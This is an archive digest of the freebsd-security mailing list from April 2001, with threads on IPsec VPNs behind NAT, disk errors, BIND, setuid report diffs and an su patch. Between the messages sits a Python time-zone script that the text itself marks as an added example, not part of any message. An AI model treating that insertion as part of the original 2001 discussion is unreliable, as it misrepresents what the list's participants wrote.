From owner-freebsd-security Sun Apr 1 13:25:42 2001
From: "Ian Cartwright"
Subject: IPSec VPN Client behind Firewall
Date: Sun, 1 Apr 2001 13:25:39 -0700

Hello All,

I have been trying to install the Nortel Contivity Extranet Client on a
Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE
(as of about a month ago) with ipfw and nat running. After scanning as many
newsgroups, mailing lists and web pages as I could find on the subject, I
have still not found a way to do this... I have seen a couple of discussions
in this newsgroup and a (hopefully) promising patch to ipfilter that may help
me (and whoever else is out there with my problem)...

The web page is: http://www.cs.ndsu.nodak.edu/~davlarso/ipf/

Dave (the author of this patch) apparently has written an IPSec proxy module
for ipfilter. Is there any way to incorporate this code into ipfw, which (if
my understanding is correct, a small but real possibility ;-) is based on
ipfilter source? If so, would this be the forum to put this request to? I am
tempted to try to hack this in myself, but I don't understand how (if?) the
ipfilter code relates to the ipfw code in the source tree.

Cheers...
Ian Cartwright

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Apr 1 14:25: 9 2001
From: Spades
To: freebsd-security@freebsd.org
Subject: Re: server kernel error
Date: Mon, 02 Apr 2001 05:35:27 +0800
Message-Id: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg>

I built another new box on a Quantum AS fireball 40G
with 128MB kingston on my 800EBmhz

I got this problem coming today non stop:

Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 status=09 error=04
Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 status=09 error=04
Apr 2 05:21:53 server2 last message repeated 2 times
Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD WRITE ERROR blk# 36374687 status=01 error=04

Any idea?

From owner-freebsd-security Sun Apr 1 14:33:37 2001
From: Ralph Huntington
To: Spades
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: server kernel error
Date: Sun, 1 Apr 2001 17:33:16 -0400 (EDT)
In-Reply-To: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg>

> I got this problem coming today non stop:
>
> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
> status=09 error=04
> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
> status=09 error=04
> Apr 2 05:21:53 server2 last message repeated 2 times
> Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD
> WRITE ERROR blk# 36374687 status=01 error=04

Looks like a bad drive to me.

From owner-freebsd-security Sun Apr 1 16:11:13 2001
From: Tony Landells
To: "Ian Cartwright"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPSec VPN Client behind Firewall
Date: Mon, 02 Apr 2001 09:11:08 +1000
Message-Id: <200104012311.JAA00720@tungsten.austclear.com.au>
In-Reply-To: Message from "Ian Cartwright" of "Sun, 01 Apr 2001 13:25:39 MST."

ian351c@home.com said:
> Dave (the author of this patch) apparently has written an IPSec proxy
> module for ipfilter. Is there any way to incorporate this code into
> ipfw, which (if my understanding is correct, a small but real
> possibility ;-) is based on ipfilter source? If so, would this be the
> forum to put this request to? I am tempted to try to hack this in
> myself, but I don't understand how (if?) the ipfilter code relates to
> the ipfw code in the source tree.

Ipfilter and ipfw are related in much the same way as Fortran and C
(read "they're not").

However, as ipfilter is supported on FreeBSD you could quite happily
change from ipfw to ipfilter and then apply the patches. Note that
this will also require changing your NAT daemon as well.

Both packages are excellent, so don't be concerned about losing out
in some way by switching.

Cheers,
Tony
--
Tony Landells
Senior Network Engineer               Ph:  +61 3 9677 9319
Australian Clearing Services Pty Ltd  Fax: +61 3 9677 9355
Level 4, Rialto North Tower
525 Collins Street
Melbourne VIC 3000
Australia

From owner-freebsd-security Sun Apr 1 16:56:52 2001
From: Igor Podlesny
To: Spades
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[2]: server kernel error
Date: Mon, 2 Apr 2001 08:00:15 +0700
Message-ID: <101241515981.20010402080015@morning.ru>
In-Reply-To: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg>
References: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg>

S> I built another new box on a Quantum AS fireball 40G
S> with 128MB kingston on my 800EBmhz

S> I got this problem coming today non stop:

S> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
S> status=09 error=04
S> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
S> status=09 error=04
S> Apr 2 05:21:53 server2 last message repeated 2 times
S> Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD
S> WRITE ERROR blk# 36374687 status=01 error=04

S> Any idea?

1) I can't clearly understand why it is in `Security' list....

2) Also, I should say I had such problems using FreeBSD (and Linux) on
some VIA chipset based motherboard. No hard drives were guilty, because
after motherboard change the problem disappeared.

--
Igor mailto:poige@morning.ru

From owner-freebsd-security Sun Apr 1 17:58:30 2001
From: "Karsten W. Rohrbach"
To: Len Conrad
Cc: freebsd-security@freebsd.org
Subject: Re: Something's happening with named
Date: Mon, 2 Apr 2001 02:58:46 +0200
Message-ID: <20010402025846.C75063@mail.webmonster.de>
In-Reply-To: <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com>; from LConrad@Go2France.com on Thu, Mar 29, 2001 at 07:54:14PM +0200
References: <4630.010329@rostokgroup.com> <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com>

couldn't bind just go away in future freebsd releases?
im running tinydns since quite some time and i am pretty happy with it.
happier than with bind ;-)

also somebody should audit /usr/src/contrib/bind/bin/host/host.c since
it may (at least at first glance) overrun some buffers since the relaxed
use of sprintf() and strcpy() which both are a bad thing [tm] and evil
;-)

/k

Len Conrad(LConrad@Go2France.com)@2001.03.29 19:54:14 +0000:
>
> >Any help would be very welcome.
>
> upgrade to 8.2.3 or 9.1.1
>
> Len
>
> http://MenAndMice.com/DNS-training : In Austin, TX; SFO, CA; Paris,
> FR
> http://BIND8NT.MEIway.com : ISC BIND 8.2.3 "NT3" for NT4 & W2K
> http://IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways

--
> 71: 69 with two fingers up your ass.
> -- George Carlin
KR433/KR11-RIPE -- http://www.webmonster.de -- ftp://ftp.webmonster.de

From owner-freebsd-security Sun Apr 1 20: 6:25 2001
From: fukuda shinichi
To: freebsd-security@freebsd.org
Subject: Re: server kernel error
Date: Mon, 02 Apr 2001 12:06:16 +0900
Message-Id: <200104020306.AA00720@fukuda.alles.ad.jp>

Mr Ralph Huntington wrote:
> > I got this problem coming today non stop:
> >
> > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
> > status=09 error=04
> > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
> > status=09 error=04
> > Apr 2 05:21:53 server2 last message repeated 2 times
> > Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD
> > WRITE ERROR blk# 36374687 status=01 error=04
>
> Looks like a bad drive to me.

agree, just plain Broken.

------------------------------
doctor lector looks GOOD.

From owner-freebsd-security Sun Apr 1 20:20:11 2001
From: Igor Podlesny
To: fukuda shinichi
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[2]: server kernel error
Date: Mon, 2 Apr 2001 11:23:38 +0700
Message-ID: <43253718998.20010402112338@morning.ru>
In-Reply-To: <200104020306.AA00720@fukuda.alles.ad.jp>
References: <200104020306.AA00720@fukuda.alles.ad.jp>

fs> Mr Ralph Huntington wrote:
>> > I got this problem coming today non stop:
>> >
>> > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
>> > status=09 error=04
>> > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
>> > status=09 error=04
>> > Apr 2 05:21:53 server2 last message repeated 2 times
>> > Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD
>> > WRITE ERROR blk# 36374687 status=01 error=04
>>
>> Looks like a bad drive to me.

fs> agree, just plain Broken.

the cite:
"...seven# Feb 11 17:45:19 seven /kernel: ad0: UDMA ICRC READ ERROR blk# 28672808 retrying..."

it was a piece of my system logs

your comments? I state that the problem wasn't in hdisk, it was in
motherboard, cause after switching to Intel chipset none of them came
back.

and another thing... what relation to security does it all have?
none, I deem :)

fs> ------------------------------
fs> doctor lector looks GOOD.

--
Igor mailto:poige@morning.ru

From owner-freebsd-security Sun Apr 1 21:11:29 2001
From: "J.A. Terranson"
To: freebsd-security@freebsd.org
Subject: Inquiry
Date: Sun, 1 Apr 2001 23:11:14 -0500 (CDT)

Would someone who is either the maintainer of, or very intimately familiar
with ftpd please contact me off list?

--
Yours,
J.A. Terranson
sysadmin@mfn.org

If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and
elected; the intentional abuse and occasionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demagoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others. Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------

From owner-freebsd-security Sun Apr 1 21:41:49 2001
From: "Kulraj Gurm"
Subject: Re: server kernel error
Date: Sun, 1 Apr 2001 21:45:09 -0700
Message-ID: <001501c0bb2f$b3085a60$64c8a8c0@asknet.com>
References: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg>

I had the same problem with Fujitsu drives, the unanimous advice I got was
to use IBM drives - which seem to be the only IDE drives that can perform
well at ATA66 or ATA100.

However, before doing the hard drive upgrade I cvsup'd to 4.3-RC - and
display of similar problems on boot vanished? What changed? I really don't
know, same hardware. Maybe someone out there knows why and can fill in a
major gap here. I still changed the drive to IBM and system is running
smoothly.

So as I see it you have two choices: wait for 4.3-RELEASE and see what
happens, or get an IBM drive.

Regards,
Kulraj Gurm

----- Original Message -----
From: "Spades"
Sent: Sunday, April 01, 2001 2:35 PM
Subject: Re: server kernel error

> I built another new box on a Quantum AS fireball 40G
> with 128MB kingston on my 800EBmhz
>
> I got this problem coming today non stop:
>
> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
> status=09 error=04
> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487
> status=09 error=04
> Apr 2 05:21:53 server2 last message repeated 2 times
> Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD
> WRITE ERROR blk# 36374687 status=01 error=04
>
> Any idea?

From owner-freebsd-security Sun Apr 1 22:58:50 2001
From: Peter Pentchev
To: "J.A. Terranson"
Cc: freebsd-security@freebsd.org
Subject: Re: Inquiry
Date: Mon, 2 Apr 2001 08:57:40 +0300
Message-ID: <20010402085740.A6377@ringworld.oblivion.bg>

On Sun, Apr 01, 2001 at 11:11:14PM -0500, J.A. Terranson wrote:
> Would someone who is either the maintainer of, or very intimately familiar
> with ftpd please contact me off list?

If you're looking for someone to report a possible security problem to,
then try security-officer@FreeBSD.org.

G'luck,
Peter

--
I am the thought you are now thinking.

From owner-freebsd-security Sun Apr 1 23:37:52 2001
From: Shoichi Sakane
To: jorge@aker.com.br
Cc: freebsd-security@freebsd.org
Subject: Re: IPSEC: racoon and Win2K
Date: Mon, 02 Apr 2001 15:36:56 +0900
Message-Id: <20010402153656U.sakane@ydc.co.jp>
In-Reply-To: Your message of "Sat, 24 Mar 2001 16:47:42 -0600" <39F078A4FCEC5D408C23FC3D92DEE4020162B9@tyr.kinsman.lan>
References: <39F078A4FCEC5D408C23FC3D92DEE4020162B9@tyr.kinsman.lan>

> The only problem I've encountered is that, when making Win2K and FreeBSD
> interoperate, the IKE's phase 2 only succeeds if
> Win2K initiates the process. If racoon is to start it, Win2k will not
> accept any proposal for phase 2, complaining that the dh group number
> (which should correctly be either 1 or 2) received is 1 or 2 (depending
> on the pfs_group setting in racoon.conf) and not null(0). If I try
> setting pfs_group to null, I get a parse error.

It would be helpful if win2k dumped some messages a little more.
please check the configurations of both racoon and win2k, and make sure
they are exactly the same. also try to delete the line, "pfs_group 2;".
I could negotiate with win2k when racoon was the initiator.

> sainfo anonymous
> {
>         # does not matter if 1 or 2, zero (expected by Win2K) won't parse.
>         pfs_group 2;
>
>         lifetime time 36000 sec;
>         lifetime byte 50000 KB;
>         encryption_algorithm 3des,des ;
>         authentication_algorithm hmac_sha1,hmac_md5;
>         compression_algorithm deflate ;
> }

From owner-freebsd-security Mon Apr 2 1:30: 6 2001
From: "|[TDP]|"
Date: Mon, 2 Apr 2001 10:25:58 +0200
Message-ID: <000a01c0bb4e$8bd4dbc0$01dc11ac@ofi.peoplecall.com>

unsubscribe tdp@psynet.net

From owner-freebsd-security Mon Apr 2 8:23:17 2001
From: Matt Piechota
To: Ian Cartwright
Subject: Re: IPSec VPN Client behind Firewall
Date: Mon, 2 Apr 2001 11:23:09 -0400 (EDT)

On Sun, 1 Apr 2001, Ian Cartwright wrote:

> I have been trying to install the Nortel Contivity Extranet Client on a
> Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE
> (as of about a month ago) with ipfw and nat running. After scanning as many
> newsgroups, mailing lists and web pages as I could find on the subject, I
> have still not found a way to do this... I have seen a couple of discussions
> in this newsgroup and a (hopefully) promising patch to ipfilter that may help
> me (and whoever else is out there with my problem)...

Depending on your setup, this could work for you:
I too use the Nortel Client and a FreeBSD-STABLE firewall on my home
network. My setup uses private internal IPs and one public IP from my
cable provider. I set up natd to forward all packets from
$nortel_switch_ip to the internal box. It's not ideal, but it does work.
If you want more info, let me know.
-- Matt Piechota Finger piechota@emailempire.com for PGP key AOL IM: cithaeron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 9:40: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from alpo.whistle.com (s206m1.whistle.com [207.76.206.1]) by hub.freebsd.org (Postfix) with ESMTP id B9B9637B71A for ; Mon, 2 Apr 2001 09:40:03 -0700 (PDT) (envelope-from erik@whistle.com) Received: from whistle.com (aspen.whistle.com [207.76.205.71]) by alpo.whistle.com (8.9.1a/8.9.1) with ESMTP id JAA10128 for ; Mon, 2 Apr 2001 09:37:19 -0700 (PDT) Message-ID: <3AC8AABF.C2B52283@whistle.com> Date: Mon, 02 Apr 2001 09:37:19 -0700 From: Erik Salander X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: IPSec and dynamic IP? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to setup setkey and racoon.conf to accomodate dynamic IP on the security gateway of a LAN-to-LAN VPN? I have a reply from Soichi below, indicating this isn't part of the KAME distribution, perhaps a patch someplace? I see references like this (from the Borderware site): The BorderWare IPSec VPN supports the use of Main Mode and Aggressive Mode for IKE Phase-1 negotiation. Main Mode provides for increased security during Phase-1 by encrypting the initial IKE traffic at the expense performance. Aggressive Mode is used in cases where the initial traffic cannot be encrypted, as is the case for dynamic IP VPN clients, or when performance is an important factor. So I wonder if there's a combo of things like 0.0.0.0 as a peer IP address (on setkey), some my_identifier alternative other than "address" (in racoon.conf) and aggressive mode that will work. 
How about for a LAN-to-host configuration, can a FreeBSD-based security gateway accomodate a host with dynamic IP? Thanks again. Erik ======================= My original post to Kame mailing list: > I have a typical LAN-to-LAN IPSec VPN working with FreeBSD 4.2-STABLE > and the latest racoon (20010222a). Here's a policy on one end: > > spdadd 10.3.1.0/24 10.3.2.0/24 any -P in ipsec > esp/tunnel/206.77.205.83-206.77.205.115/require; > > What would I specify for setkey if one of the security gateways had a > dynamically assigned IP address on its public interface? Soichi's reply: KAME doesn't support a dynamically assinged ip address as the end point of the IPSec tunnel. I'm not sure someone may have a pactch which is be able to do that. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 11:15:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 0FFD237B722 for ; Mon, 2 Apr 2001 11:15:44 -0700 (PDT) (envelope-from cjclark@alum.mit.edu) Received: from alum.mit.edu ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GB6G1Q00.RW1; Mon, 2 Apr 2001 11:15:26 -0700 Message-ID: <3AC8C1CF.30A5ACAD@alum.mit.edu> Date: Mon, 02 Apr 2001 11:15:43 -0700 From: Crist Clark X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Ian Cartwright Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSec VPN Client behind Firewall References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ian Cartwright wrote: > > Hello All, > > I have been trying to install the Nortel Contivity Extranet Client on a > Windows 2000 box behind my FreeBSD firewall. 
The firewall is FreeBSD-STABLE > (as of about amonth ago) with ipfw and nat running. After, scanning as many > newsgroups, mailing lists and web pages as I could find on the subject, I > have still not found a way to do this... I have seen a couple discussion in > this newsgroup and a (hopefully) promising patch to ipfilter that may help > me (and whoever else is out there with my problem)... > > The web page is: http://www.cs.ndsu.nodak.edu/~davlarso/ipf/ > > Dave (the author of this patch) apparently has written an IPSec proxy module > for ipfilter. Is there any way to incorporate this code into ipfw, which (if > my understanding is correct, a small but real possibility ;-) is based on > ipfilter source? If so, would this be the forum to put this request to? I am > tempted to try to hack this in myself, but I don't understand how (if?) the > ipfilter code relates to the ipfw code in the source tree. This is really not a ipfw(8) issue, but rather a natd(8) one. Having said that, if you are just going to do ESP and we're doing standard IPsec, you need to poke a hole in the firewall for the ESP protocol (50) and IKE (500/udp) communications. natd(8) will handle the keying over UDP fine (since NAT of UDP and TCP are classics). As for ESP, last I knew, natd(8) will handle a single ESP association just fine. I've never used the Nortel client, but I've tested a Cisco IPsec client from behind a NAT'ing FreeBSD firewall without problems (using both naked ESP and UDP encapsulated (bleh!) ESP). The most likely place for problems will be in the key exchange and it might take deep voodoo to get that to go. -- Crist J. 
Clark cjclark@alum.mit.edu

From owner-freebsd-security Mon Apr 2 11:44:28 2001
From: dfinkelstein@rsasecurity.com
To: "Ian Cartwright"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPSec VPN Client behind Firewall
Date: Mon, 02 Apr 2001 11:44:17 -0700

"Ian Cartwright" wrote:
>I have been trying to install the Nortel Contivity Extranet Client on a
>Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE
>(as of about a month ago) with ipfw and nat running. After scanning as many
>newsgroups, mailing lists and web pages as I could find on the subject, I
>have still not found a way to do this... I have seen a couple of discussions in
>this newsgroup and a (hopefully) promising patch to ipfilter that may help
>me (and whoever else is out there with my problem)...

I saw a message somewhere (I thought it was here) about somebody who
accomplished this by simply setting up a firewall rule to allow full
access to/from the other end of his VPN pipe.

I have tested this with my Nortel client (running on an NT laptop); I just
added rules to ipfw to allow traffic to and from my VPN connection. Seems
to work great, though you are open to attacks due to IP spoofing.

--- David

From owner-freebsd-security Mon Apr 2 12:16:10 2001
Date: Mon, 2 Apr 2001 19:04:27 +0200
From: Gerhard Sittig
To: freebsd-security@freebsd.org
Subject: Re: Something's happening with named

On Mon, Apr 02, 2001 at 02:58 +0200, Karsten W. Rohrbach wrote:
>
> couldn't bind just go away in future freebsd releases?
> im running tinydns since quite some time and i am pretty happy
> with it. happier than with bind ;-)

While those who know both program suites will agree on the
advantages of djbdns (quality and fitness in all the vanilla
setups, only bigger setups need(?) special BIND features),
there's not only the technological side in this topic.

It's *very* easy to do something wrong and collide with DJB's
licensing scheme. There have been multiple discussions about
this very topic, the latest was within the past two months.
Unless there's a definitive statement about the legalese DJBware
won't get packaged and shipped with a distro. Maybe you want to
bug DJB for an ACK? (hint, hint)

While I understand his reasoning ("Any deviation from my design
is a bug and voids my warranty") I see the concerns of
distributors, too ("Will he sue me for installing it into a
different location? Will he sue me for extending it while still
calling it djbdns? May I even binary package and ship it?").
Sorry, I lack English words. But in German "heikel"
("troublesome"?) would be most appropriate. I'm sure the other
replies will tend to some "highly dangerous from the non
technical POV", too. :(

We all should be glad that it's so easy to not run bind and
install djbdns from the ports instead. This makes it a
consious(sp?) decision by the admin. It's very much like running
an MTA different from sendmail or running non main stream
software at all: You're free to do it but you have to take care
yourself ...

virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

From owner-freebsd-security Mon Apr 2 21: 0:24 2001
Date: Tue, 3 Apr 2001 00:00:18 -0400 (EDT)
From: Mikhail Kruk
Subject: odd setuid diffs

I got very strange (IMHO) setuid diffs in my security reports today... Any
explanations appreciated:

xxxx.xxxx.xxx setuid diffs:
69c69
< 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 16:20:56 2000 /usr/local/bin/screen-3.9.5
---
> 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 17:20:56 2000 /usr/local/bin/screen-3.9.5
71c71
< 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 22:19:08 1999 /usr/local/sbin/hfaxd
---
> 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 23:19:08 1999 /usr/local/sbin/hfaxd

They are off by one hour, all right. I see possible cause: yesterday I've
noticed that my time was set to EST instead of EDT and changed my
timezone (one hour difference). But the question is: why those two files,
not the rest of them?? What do they have in common?

(Running 4.3-BETA FreeBSD 4.3-BETA #11: Fri Mar 9 03:36:40 EST 2001)

From owner-freebsd-security Mon Apr 2 21:11:13 2001
Date: Mon, 2 Apr 2001 23:08:29 -0500 (CDT)
From: James Wyatt
To: Mikhail Kruk
Cc: security@freebsd.org
Subject: Re: odd setuid diffs

They were all across the DST change barrier last year and the year before.
We are just past the DST barrier this year. - Jy@

On Tue, 3 Apr 2001, Mikhail Kruk wrote:

> Date: Tue, 3 Apr 2001 00:00:18 -0400 (EDT)
> From: Mikhail Kruk
> To: security@freebsd.org
> Subject: odd setuid diffs
>
> I got very strange (IMHO) setuid diffs in my security reports today... Any
> explanations appreciated:
>
> xxxx.xxxx.xxx setuid diffs:
> 69c69
> < 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 16:20:56 2000
> /usr/local/bin/screen-3.9.5
> ---
> > 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 17:20:56 2000
> /usr/local/bin/screen-3.9.5
> 71c71
> < 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 22:19:08 1999
> /usr/local/sbin/hfaxd
> ---
> > 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 23:19:08 1999
> /usr/local/sbin/hfaxd
>
> They are off by one hour, all right.
> I see possible cause: yesterday I've
> noticed that my time was set to EST instead of EDT and changed my
> timezone (one hour difference). But the question is: why those two files,
> not the rest of them?? What do they have in common?
>
> (Running 4.3-BETA FreeBSD 4.3-BETA #11: Fri Mar 9 03:36:40 EST 2001)

From owner-freebsd-security Tue Apr 3 7:25:29 2001
Date: Tue, 3 Apr 2001 09:27:27 -0500
From: Mipam
To: Erik Salander
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPSec and dynamic IP?

On Mon, Apr 02, 2001 at 09:37:19AM -0700, Erik Salander wrote:
>
> Is there a way to setup setkey and racoon.conf to accommodate dynamic
> IP on the security gateway of a LAN-to-LAN VPN? I have a reply from
> Soichi below, indicating this isn't part of the KAME distribution,
> perhaps a patch someplace?

Racoon won't support dynamic ip's.
However, i believe isakmpd from openbsd does.
You could try to use that for example, i use it under netbsd,
don't use it with dynamic ip, but i heard that some guys who use
openbsd with isakmpd have it running with dynamic ip's :)
Bye,

Mipam.

From owner-freebsd-security Tue Apr 3 7:28:48 2001
Date: Tue, 3 Apr 2001 09:30:47 -0500
From: Mipam
To: Erik Salander
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPSec and dynamic IP?

Eeeeh, small correction.
Racoon does not support dynamic ip's now that is.
I don't know if it will in the future, so my statement
"it won't" could be very wrong, sorry.

Mipam.
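
Added example (not part of any message in this digest) for the "odd setuid diffs" thread above: the same stored mtimes rendered under a zone without daylight saving and under one with it, showing that only summer-dated entries move by an hour. It assumes the old setting was fixed EST and the new one follows the 1987-2006 US rule; the third file and all function names are constructed for illustration.

```python
"""Why only some lines of a setuid listing change after a time zone fix."""
from datetime import date, datetime, timedelta, timezone

EST = timezone(timedelta(hours=-5), "EST")
EDT = timezone(timedelta(hours=-4), "EDT")


def _first_sunday(year, month):
    d = date(year, month, 1)
    return d + timedelta(days=(6 - d.weekday()) % 7)


def _last_sunday(year, month, last_day):
    d = date(year, month, last_day)
    return d - timedelta(days=(d.weekday() + 1) % 7)


def to_fixed_est(epoch):
    """Assumed old setting: a zone that is UTC-5 all year."""
    return datetime.fromtimestamp(epoch, EST)


def to_us_eastern(epoch):
    """Assumed new setting: US rule of 1987-2006, EDT from the first Sunday
    in April (02:00 EST) until the last Sunday in October (02:00 EDT)."""
    utc = datetime.fromtimestamp(epoch, timezone.utc)
    s = _first_sunday(utc.year, 4)
    e = _last_sunday(utc.year, 10, 31)
    start = datetime(s.year, s.month, s.day, 7, tzinfo=timezone.utc)  # 02:00 EST
    end = datetime(e.year, e.month, e.day, 6, tzinfo=timezone.utc)    # 02:00 EDT
    return utc.astimezone(EDT if start <= utc < end else EST)


def ls_time(dt):
    """Format a timestamp the way the report shows it."""
    return f"{dt:%b} {dt.day:2d} {dt:%H:%M:%S %Y}"


def epoch_est(y, mo, d, h, mi, s):
    """Epoch seconds for a wall-clock time read as fixed EST."""
    return int(datetime(y, mo, d, h, mi, s, tzinfo=EST).timestamp())


# The first two mtimes are the "<" lines of the report, read as fixed EST
# (assumption). The third entry is constructed: a file last modified in winter.
FILES = [
    ("/usr/local/bin/screen-3.9.5", epoch_est(2000, 7, 19, 16, 20, 56)),
    ("/usr/local/sbin/hfaxd", epoch_est(1999, 6, 3, 22, 19, 8)),
    ("/usr/local/bin/example-winter", epoch_est(2001, 1, 15, 12, 0, 0)),
]


def listing(files, render):
    """Map path -> rendered mtime, as one nightly listing would show it."""
    return {path: ls_time(render(mtime)) for path, mtime in files}


def text_diff(old, new):
    """Paths whose rendered line differs: what a textual diff reports."""
    return sorted(p for p in old if old[p] != new.get(p))


def epoch_diff(old_files, new_files):
    """Paths whose stored mtime really changed."""
    new = dict(new_files)
    return sorted(p for p, m in old_files if new.get(p) != m)


def demo():
    before = listing(FILES, to_fixed_est)
    after = listing(FILES, to_us_eastern)
    return text_diff(before, after), epoch_diff(FILES, FILES)


if __name__ == "__main__":
    shown, real = demo()
    print("lines a textual diff flags:", shown)
    print("files whose mtime changed: ", real)
```

Comparing stored epoch values instead of rendered local times keeps a zone change out of the nightly report.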

From owner-freebsd-security Tue Apr 3 10:20:20 2001
From: Cy Schubert - ITSD Open Systems Group
To: mipam@ibb.net
Cc: Erik Salander, freebsd-security@FreeBSD.ORG
Subject: Re: IPSec and dynamic IP?
Date: Tue, 03 Apr 2001 10:18:07 -0700

In message <20010403093047.B15044@bootp-20-219.bootp.virginia.edu>, Mipam writes:
> Eeeeh, small correction.
> Racoon does not support dynamic ip's now that is.
> I don't know if it will in the future, so my statement
> "it won't" could be very wrong, sorry.

I use pipsecd between home (@home) and work. Pipsecd does not support
IKE though it does support dynamic IP's. It also has the advantage of
allowing me to filter (IPF or IPFW) based on the encapsulating packet
via xl0 and the encapsulated packet via tun0.

Regards,
Cy Schubert
Team Leader, Sun/Alpha Team
Open Systems Group, ITSD, ISTA
Province of BC
Phone: (250)387-8437
Fax: (250)387-5766
Internet: Cy.Schubert@osg.gov.bc.ca

From owner-freebsd-security Tue Apr 3 10:31:28 2001
From: "Kherry Zamore"
Subject: su change?
Date: Tue, 3 Apr 2001 13:28:23 -0400

Just recently my friend locked himself out of his machine by changing root's
shell to a nonexisting file. The only way he could become root again was by
rebooting the machine into single user mode and changing it from there. Now
while I know that it's foolish to change root's shell in the first place, i
don't think this is an acceptable punishment for those that do.

According to su.c, if the user you are changing to does not have a valid
shell, su complains and exits. A valid thing to do in today's security
conscience society. Now, let's say you want to become root to fix this
invalid shell problem.. su's nature is to complain and exit. The fix is
rather simple, somewhere around line 310 in su.c is:

    if (!chshell(pwd->pw_shell) && ruid)
        errx(1, "permission denied (shell).");

The only thing we need to prepend to this is a check to see if we are trying
to su to root, which we should allow regardless of the shell specified:

    if (pwd->pw_uid)
        if (!chshell(pwd->pw_shell) && ruid)
            errx(1, "permission denied (shell).");

Patches are available here (tested on 4.1):
http://www.dknj.org/sourcecode/patches/su/

-= Kherry Zamore -=- (757) 683-7386 =-
-= Resident Computer & Network Geek/God =-
-= http://www.dknj.org =-

From owner-freebsd-security Tue Apr 3 10:43:33 2001
Date: Tue, 03 Apr 2001 12:47:16 -0500
From: ben hubbard
To: Kherry Zamore, freebsd-security@FreeBSD.ORG
Subject: Re: su change?

Idiot that I am, I did the exact same thing on a new box last week - and
was less than pleased with myself, and with su's resulting behavior.

so, thanks - methinks this is good.

Ben

Kherry Zamore wrote:

> Just recently my friend locked himself out of his machine by changing root's
